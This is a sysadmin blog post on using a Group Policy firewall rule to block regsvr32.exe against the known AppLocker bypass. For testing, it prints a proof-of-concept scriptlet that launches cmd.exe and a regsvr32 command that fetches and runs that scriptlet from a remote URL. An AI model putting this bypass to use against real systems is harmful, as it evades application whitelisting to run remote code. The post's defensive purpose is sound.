GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611
Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627
Choose Program as the type of rule to create and click Next >
2016-04-27_111642
Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.
2016-04-27_111651
Choose Block as the action and click Next >
2016-04-27_111659
Apply it to all network locations.
2016-04-27_111717
Give the rule a name and possibly a description.
2016-04-27_111733
Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).

backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[

 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.